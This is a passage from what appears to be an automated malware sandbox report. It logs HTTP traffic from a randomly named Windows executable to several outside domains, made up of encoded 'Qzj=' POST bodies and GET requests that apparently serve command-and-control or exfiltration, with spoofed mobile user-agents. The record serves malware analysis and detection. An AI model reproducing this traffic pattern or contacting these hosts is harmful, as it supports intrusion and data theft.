                                                                                                                    Data Ascii: Qzj=6oGhiNTWWXcP+AgbdjxLdaqS4cRnjBtTMEIVdZeUoqVtYBg7oEXMOoY5ue2ERhoG0zulUAe5xLNy1zk3QuWVWoRNLr8Wvwcve3OKAvp94NYfVoupE93j50qZMaOEOo9Xo6j3dOTpnlgtsS5O1ZgZjsLzUewBu4t/zOseBAZ6RurWDA0OUKRqKqvARMOT3+AhKw==
                                                                                                                    Oct 24, 2024 05:08:17.655010939 CEST359INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Thu, 24 Oct 2024 03:08:17 GMT
                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                    Content-Length: 196
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    18192.168.2.45002091.212.26.5805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:08:19.392584085 CEST827OUTPOST /r61b/ HTTP/1.1
                                                                                                                    Host: www.mjcregionsud.org
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.mjcregionsud.org
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 220
                                                                                                                    Referer: http://www.mjcregionsud.org/r61b/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 36 6f 47 68 69 4e 54 57 57 58 63 50 78 42 77 62 53 67 5a 4c 61 36 71 52 6d 4d 52 6e 36 52 74 58 4d 45 4d 56 64 59 71 36 70 59 78 74 59 68 77 37 70 46 58 4d 62 6f 59 35 38 2b 32 42 4d 78 6f 59 30 7a 54 59 55 46 32 35 78 4c 4a 79 31 33 67 33 51 5a 4c 44 56 59 52 4c 41 4c 38 48 79 41 63 76 65 33 4f 4b 41 76 38 31 34 4e 41 66 56 59 2b 70 46 66 66 67 36 30 71 65 45 36 4f 45 46 49 39 70 6f 36 6a 56 64 50 2f 50 6e 6a 38 74 73 54 4a 4f 32 4e 30 61 71 73 4c 78 62 2b 78 73 2b 5a 39 30 2b 4c 42 7a 48 54 4a 50 58 39 33 6e 50 6d 6c 55 46 37 77 39 59 71 4c 7a 4d 4c 48 6e 36 39 39 6f 52 33 55 34 4e 35 4f 6d 5a 44 61 4d 50 4b 49 38 72 69 34 4a 73 66 51 3d
                                                                                                                    Data Ascii: Qzj=6oGhiNTWWXcPxBwbSgZLa6qRmMRn6RtXMEMVdYq6pYxtYhw7pFXMboY58+2BMxoY0zTYUF25xLJy13g3QZLDVYRLAL8HyAcve3OKAv814NAfVY+pFffg60qeE6OEFI9po6jVdP/Pnj8tsTJO2N0aqsLxb+xs+Z90+LBzHTJPX93nPmlUF7w9YqLzMLHn699oR3U4N5OmZDaMPKI8ri4JsfQ=
                                                                                                                    Oct 24, 2024 05:08:20.211451054 CEST359INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Thu, 24 Oct 2024 03:08:20 GMT
                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                    Content-Length: 196
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    19192.168.2.45002191.212.26.5805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:08:21.942280054 CEST10909OUTPOST /r61b/ HTTP/1.1
                                                                                                                    Host: www.mjcregionsud.org
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.mjcregionsud.org
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10300
                                                                                                                    Referer: http://www.mjcregionsud.org/r61b/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 36 6f 47 68 69 4e 54 57 57 58 63 50 78 42 77 62 53 67 5a 4c 61 36 71 52 6d 4d 52 6e 36 52 74 58 4d 45 4d 56 64 59 71 36 70 59 35 74 5a 53 6f 37 70 69 37 4d 4a 59 59 35 2f 2b 32 41 4d 78 70 45 30 7a 37 63 55 46 79 44 78 4e 56 79 32 55 6f 33 42 4e 2f 44 43 6f 52 4c 50 72 39 41 76 77 63 32 65 7a 53 47 41 76 73 31 34 4e 41 66 56 65 79 70 43 4e 33 67 38 30 71 5a 4d 61 4f 41 4f 6f 38 45 6f 36 36 71 64 50 4c 35 6d 51 6b 74 73 7a 5a 4f 6c 4f 4d 61 32 38 4c 76 50 65 78 30 2b 5a 77 73 2b 50 68 52 48 51 55 55 58 36 66 6e 66 53 63 41 47 66 45 59 4b 72 2f 33 64 35 48 4c 6a 2b 5a 52 4f 6c 73 47 4a 5a 36 41 5a 43 7a 69 46 70 70 65 77 67 63 32 36 62 64 6b 65 33 2b 42 71 2f 54 2f 58 59 62 56 4f 62 56 59 52 70 34 42 4c 51 4c 49 4f 31 36 43 54 65 79 65 57 76 4f 58 6e 4f 73 56 62 31 73 52 77 47 36 67 6d 30 66 79 49 63 45 6c 55 58 47 64 4e 4d 39 73 45 6a 74 2f 34 53 78 58 62 58 43 74 4b 59 71 4a 51 55 54 76 5a 79 59 50 50 6b 52 63 44 68 67 77 31 34 7a 55 4b 2b 52 36 70 5a 44 67 31 6f 72 57 43 79 6a 68 68 69 [TRUNCATED]
                                                                                                                    Data Ascii: Qzj=6oGhiNTWWXcPxBwbSgZLa6qRmMRn6RtXMEMVdYq6pY5tZSo7pi7MJYY5/+2AMxpE0z7cUFyDxNVy2Uo3BN/DCoRLPr9Avwc2ezSGAvs14NAfVeypCN3g80qZMaOAOo8Eo66qdPL5mQktszZOlOMa28LvPex0+Zws+PhRHQUUX6fnfScAGfEYKr/3d5HLj+ZROlsGJZ6AZCziFppewgc26bdke3+Bq/T/XYbVObVYRp4BLQLIO16CTeyeWvOXnOsVb1sRwG6gm0fyIcElUXGdNM9sEjt/4SxXbXCtKYqJQUTvZyYPPkRcDhgw14zUK+R6pZDg1orWCyjhhiYpSuP31Cg/37iRvk0pUPzqGd6TN11BVgGxvOH7ZI47V/EDOsjei4vZF1i8VyJWPbuEYFI4ysp55kl3Jj3rHrG9TaDn8tlgdBn/bwH+k1qvpzY7OBPam88CH4WHSCRdTXMzXZK7DIUOtMpZsqDHVpZ6xWW4gjHa9UROHVJTQiUQfatQPqxXQMBEgkjfNWnaC5djdj2ODVBF+PhOsVQPb8wYmjGj+NynKSn1k2Kbc6BnK/iANOY5sORdDkGPCNh2H6sxptLfqHOvkYtq2slAW5x5iQvw4x8pBucGHCwN0SkbX698AxGJLxRTWiiOChWTBSKecLMMyGO7pJRcWXvUZ0+0kqzx7i+B9JQa8rvTANwMGMzd06Djigf9Vkyht5RHUxJHON6RJRVUwQxkxeJuGnWZJzcoR9i3owyJn9TxH4fGoCf6ySNGa88NvORfkWoA1yBapT30ylp8wmwDpCRbfp69MTOUES3tk8u+9XwltThjhmdsxdGStyqXapSOsYw2vpjznI9JDDeKHkkWCR5Bxjiv9rHocPM+Z0d3Qb+G2b4u+MwngXDV8HhtyfAh8eXCJuzZxWNUH7ErXn7SGbt7tTbzh0ZwRJNzYN2CC8PxHCXd9SMkTAnwYlBVLpNK+i1NeLYCMrq5Oupaycj0aMkAy++L50xLaklH4Lod [TRUNCATED]
                                                                                                                    Oct 24, 2024 05:08:22.769256115 CEST359INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Thu, 24 Oct 2024 03:08:22 GMT
                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                    Content-Length: 196
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    20192.168.2.45002291.212.26.5805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:08:24.478240967 CEST535OUTGET /r61b/?Qzj=3quBh4mzL0lL+B9uaAFlB72ZycJbxnt6GENoLoKygJVSWFdT0X7NdoQT/6uiE3Ni1BD7Zx2rh99upTwYdPvuDtoYAZVOuycnaW3rI/gIwuhnX/+XN/+iqEA=&Znyl=2rnxDB HTTP/1.1
                                                                                                                    Host: www.mjcregionsud.org
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Oct 24, 2024 05:08:25.318906069 CEST359INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Thu, 24 Oct 2024 03:08:25 GMT
                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                    Content-Length: 196
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    21192.168.2.4500233.33.130.190805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:08:30.491925001 CEST825OUTPOST /kbee/ HTTP/1.1
                                                                                                                    Host: www.levelsabovetravel.info
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.levelsabovetravel.info
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 200
                                                                                                                    Referer: http://www.levelsabovetravel.info/kbee/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 4f 41 49 7a 4c 73 6b 44 2f 39 79 2b 7a 5a 32 6b 6f 5a 41 78 52 6a 31 45 4d 4d 7a 35 6c 52 71 30 72 63 78 31 38 37 4e 59 79 33 78 54 72 65 64 34 66 74 44 33 4a 69 35 6e 68 4f 4c 2f 5a 62 6b 34 68 47 76 4c 79 6a 33 69 6a 46 45 44 33 4b 52 30 68 2b 7a 31 42 75 64 6d 55 32 47 52 4b 68 59 50 78 77 78 41 49 49 34 4a 56 4b 44 2b 6b 38 54 6d 2f 69 6f 64 75 56 48 33 74 32 33 42 4f 6a 6b 63 63 31 71 4e 71 78 39 31 7a 71 73 6c 31 4e 76 68 7a 7a 42 50 46 76 67 44 36 39 56 59 30 39 61 78 6a 66 71 4a 34 32 61 34 4f 76 55 6e 48 79 73 68 4c 39 57 2b 64 2f 72 74 68 73 42 74 55 34 62 6c 43 51 3d 3d
                                                                                                                    Data Ascii: Qzj=OAIzLskD/9y+zZ2koZAxRj1EMMz5lRq0rcx187NYy3xTred4ftD3Ji5nhOL/Zbk4hGvLyj3ijFED3KR0h+z1BudmU2GRKhYPxwxAII4JVKD+k8Tm/ioduVH3t23BOjkcc1qNqx91zqsl1NvhzzBPFvgD69VY09axjfqJ42a4OvUnHyshL9W+d/rthsBtU4blCQ==


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    22192.168.2.4500243.33.130.190805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:08:33.034070969 CEST845OUTPOST /kbee/ HTTP/1.1
                                                                                                                    Host: www.levelsabovetravel.info
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.levelsabovetravel.info
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 220
                                                                                                                    Referer: http://www.levelsabovetravel.info/kbee/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 4f 41 49 7a 4c 73 6b 44 2f 39 79 2b 77 39 79 6b 71 37 6f 78 57 44 31 48 4a 4d 7a 35 71 78 71 34 72 63 4e 31 38 36 49 64 7a 46 56 54 6f 38 56 34 65 73 44 33 46 43 35 6e 31 65 4c 77 55 37 6b 33 68 48 53 32 79 68 6a 69 6a 45 67 44 33 4c 68 30 68 73 62 79 42 2b 64 6b 59 57 47 54 46 42 59 50 78 77 78 41 49 49 38 6e 56 4c 72 2b 6b 50 4c 6d 74 51 51 65 77 6c 48 30 73 32 33 42 5a 7a 6b 59 63 31 72 67 71 77 51 51 7a 6f 55 6c 31 4d 66 68 7a 68 70 4d 50 76 67 2f 30 64 55 4f 34 39 2f 64 6f 4b 50 4a 37 6b 32 38 47 75 41 6b 50 55 39 37 61 4d 33 70 50 2f 50 65 38 72 49 5a 5a 37 6d 73 5a 65 68 6f 72 49 56 4e 63 64 31 42 34 41 6c 51 55 74 2b 6c 64 73 30 3d
                                                                                                                    Data Ascii: Qzj=OAIzLskD/9y+w9ykq7oxWD1HJMz5qxq4rcN186IdzFVTo8V4esD3FC5n1eLwU7k3hHS2yhjijEgD3Lh0hsbyB+dkYWGTFBYPxwxAII8nVLr+kPLmtQQewlH0s23BZzkYc1rgqwQQzoUl1MfhzhpMPvg/0dUO49/doKPJ7k28GuAkPU97aM3pP/Pe8rIZZ7msZehorIVNcd1B4AlQUt+lds0=


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    23192.168.2.4500253.33.130.190805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:08:35.579598904 CEST10927OUTPOST /kbee/ HTTP/1.1
                                                                                                                    Host: www.levelsabovetravel.info
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.levelsabovetravel.info
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10300
                                                                                                                    Referer: http://www.levelsabovetravel.info/kbee/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 4f 41 49 7a 4c 73 6b 44 2f 39 79 2b 77 39 79 6b 71 37 6f 78 57 44 31 48 4a 4d 7a 35 71 78 71 34 72 63 4e 31 38 36 49 64 7a 46 64 54 72 50 4e 34 66 50 62 33 45 43 35 6e 70 75 4b 33 55 37 6b 71 68 48 4c 78 79 68 66 49 6a 48 49 44 32 70 5a 30 32 6f 50 79 4c 2b 64 6b 48 6d 47 57 4b 68 5a 56 78 77 42 45 49 49 4d 6e 56 4c 72 2b 6b 4f 37 6d 75 43 6f 65 79 6c 48 33 74 32 33 7a 4f 6a 6c 4e 63 31 44 65 71 77 55 75 77 59 30 6c 30 73 50 68 78 53 42 4d 44 76 67 39 33 64 55 47 34 39 44 43 6f 4f 76 2f 37 67 32 57 47 75 30 6b 4e 79 78 67 42 4d 4b 31 52 35 6e 7a 69 62 73 67 66 4b 36 4d 58 74 39 75 72 70 4a 4d 48 65 39 4e 35 7a 77 33 47 34 71 6e 41 34 53 59 77 30 74 6c 42 71 61 31 43 50 32 66 50 79 6f 32 42 52 2f 7a 67 41 47 79 6a 44 36 52 31 42 66 56 42 4b 7a 62 6a 45 78 72 32 72 63 64 4e 59 6f 74 37 4a 6b 30 52 4b 79 30 48 6f 7a 47 75 52 66 42 6b 32 49 6a 52 42 71 54 78 2f 52 68 54 70 67 49 35 6f 6b 52 74 71 5a 4e 65 49 31 6c 50 37 79 35 43 75 32 69 50 57 39 2f 79 64 6d 49 32 74 45 78 6e 64 72 54 6a 44 [TRUNCATED]
                                                                                                                    Data Ascii: Qzj=OAIzLskD/9y+w9ykq7oxWD1HJMz5qxq4rcN186IdzFdTrPN4fPb3EC5npuK3U7kqhHLxyhfIjHID2pZ02oPyL+dkHmGWKhZVxwBEIIMnVLr+kO7muCoeylH3t23zOjlNc1DeqwUuwY0l0sPhxSBMDvg93dUG49DCoOv/7g2WGu0kNyxgBMK1R5nzibsgfK6MXt9urpJMHe9N5zw3G4qnA4SYw0tlBqa1CP2fPyo2BR/zgAGyjD6R1BfVBKzbjExr2rcdNYot7Jk0RKy0HozGuRfBk2IjRBqTx/RhTpgI5okRtqZNeI1lP7y5Cu2iPW9/ydmI2tExndrTjDF2cxm7/Ip1bftt/+U9zxFJP1MEeb5t2yAvUEWfYaY5WUMZxyb7Qo+36G7wOhqDtaE3VE8nbdhlXCKgLyFv/u05HAsgLSU8hLUmQ7rPlO2O2dBrY4/FFgbZ0VVXfRBK9UkFv2mUvfhUFcftgSsYwvetElx3vxSsL0fLaeCfvwwMzZ+E1LwRPnescht+2ZD2knvy1LuFunQ55HiOgTp2JIo6LByQ/sUDgyPlyZCrvJzO8tUUMXy2aVk1fjvAiFwNy4VLNUPudnfaRLMB4ou95qLV5H/N709zDLJ+mMwB9ZT8Nfn4br1ENmrqcXztYD+9KiCO1AFcbbI13myxV4vAz9ADUzSky65Kri1mNR/dmp5MeW1dPZYphPS4njUWjmrRTBVHrdMnBAmgWgJO0z9G6FXs+Hv8iqcTweLAGuJ5/FpR+CFX8Xc5+uxcm2xg3y2CgHL+CMGDHHqEWNBYSSixOc4lnj0HEv/lsK4IpwQcy1bEFvqQ1gEuYL4vg51moNqoU5LG8Ha0atKT4bqhFUrOJd1XzSdoQkPa9MMtkhW0WQQJls/PlXsNip5G0943cvdGZukttIFh+qkBZmwGF7UQWtfCDn/MmsxPWt+tBJcepf6lshbkzNfZcJi5slWrXlxUJmvM7gcqWg3wiI42e1YCYutvM8dGh/HXx+aI [TRUNCATED]


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    24192.168.2.4500263.33.130.190805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:08:38.123347044 CEST541OUTGET /kbee/?Qzj=DCgTIaYcg8rLkvez6aURNH1rI8GLniCnkbIF1Zor3lwvkrlOJ/rxEwh4juCbWbA1v3jo2CjSkAc6+9U16ObyIJEVbwGNWxBZ4iE6d4sVGLDCvtPxuAtI0Gg=&Znyl=2rnxDB HTTP/1.1
                                                                                                                    Host: www.levelsabovetravel.info
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Oct 24, 2024 05:08:38.743752956 CEST391INHTTP/1.1 200 OK
                                                                                                                    Server: openresty
                                                                                                                    Date: Thu, 24 Oct 2024 03:08:38 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 251
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 51 7a 6a 3d 44 43 67 54 49 61 59 63 67 38 72 4c 6b 76 65 7a 36 61 55 52 4e 48 31 72 49 38 47 4c 6e 69 43 6e 6b 62 49 46 31 5a 6f 72 33 6c 77 76 6b 72 6c 4f 4a 2f 72 78 45 77 68 34 6a 75 43 62 57 62 41 31 76 33 6a 6f 32 43 6a 53 6b 41 63 36 2b 39 55 31 36 4f 62 79 49 4a 45 56 62 77 47 4e 57 78 42 5a 34 69 45 36 64 34 73 56 47 4c 44 43 76 74 50 78 75 41 74 49 30 47 67 3d 26 5a 6e 79 6c 3d 32 72 6e 78 44 42 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Qzj=DCgTIaYcg8rLkvez6aURNH1rI8GLniCnkbIF1Zor3lwvkrlOJ/rxEwh4juCbWbA1v3jo2CjSkAc6+9U16ObyIJEVbwGNWxBZ4iE6d4sVGLDCvtPxuAtI0Gg=&Znyl=2rnxDB"}</script></head></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    25192.168.2.450027154.23.184.194805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:08:44.183862925 CEST786OUTPOST /9m01/ HTTP/1.1
                                                                                                                    Host: www.d81dp.top
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.d81dp.top
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 200
                                                                                                                    Referer: http://www.d81dp.top/9m01/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
